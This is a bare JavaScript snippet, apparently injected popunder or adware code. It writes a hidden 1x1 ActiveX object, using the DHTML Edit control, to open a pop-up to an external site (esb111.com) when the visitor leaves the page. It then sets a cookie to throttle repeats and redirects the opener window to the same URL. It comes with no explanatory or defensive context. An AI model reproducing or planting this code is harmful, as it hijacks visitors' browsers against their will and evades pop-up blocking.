document.writeln("<script language=\"javascript\">");
document.writeln("function setCookie(name,value,days){");
document.writeln("        var exp=new Date();");
document.writeln("        exp.setTime(exp.getTime() + 1*1*1000);\/\/");
document.writeln("        var arr=document.cookie.match(new RegExp(\"(^| )\"+name+\"=([^;]*)(;|$)\"));");
document.writeln("        document.cookie=name+\"=\"+escape(value)+\";expires=\"+exp.toGMTString();");
document.writeln("}");
document.writeln("function getCookie(name){");
document.writeln("        var arr=document.cookie.match(new RegExp(\"(^| )\"+name+\"=([^;]*)(;|$)\"));");
document.writeln("        if(arr!=null){");
document.writeln("                return unescape(arr[2]);");
document.writeln("                return null;");
document.writeln("        }");
document.writeln("}");
document.writeln("function delCookie(name){");
document.writeln("        var exp=new Date();");
document.writeln("        exp.setTime(exp.getTime()-1);");
document.writeln("        var cval=getCookie(name);");
document.writeln("        if(cval!=null){");
document.writeln("                document.cookie=name+\"=\"+cval+\";expires=\"+exp.toGMTString();");
document.writeln("        }");
document.writeln("}");
document.writeln("document.write(\'<object id=\"stb\" height=\"1\" width=\"1\" classid=\"clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A\">\');");
document.writeln("document.write(\'<param name=\"ActivateActiveXControls\" value=\"1\">\');");
document.writeln("document.write(\'<param name=\"ActivateApplets\" value=\"1\">\');");
document.writeln("document.write(\'<\/object>\');");
document.writeln("var popurl = \'http:\/\/esb111.com\/?Intr=3463\';\/\/");
document.writeln("var popDialogOptions = \"top=0,left=0,toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=1024px,height=652px\";");
document.writeln("function popwin(popurl,target,popDialogOptions){");
document.writeln("        stb.DOM.Script.window.open(popurl,target,popDialogOptions);");
document.writeln("}");
document.writeln("window.onbeforeunload = function (){");
document.writeln("        if(!getCookie(\"tuitan\")){");
document.writeln("                setCookie(\"tuitan\",\"yes\",12);popwin(popurl,\'_blank\',popDialogOptions);");
document.writeln("        }");
document.writeln("}");
document.writeln("<\/script>")

if(parent.window.opener)
parent.window.opener.location='http://esb111.com/?Intr=3463';
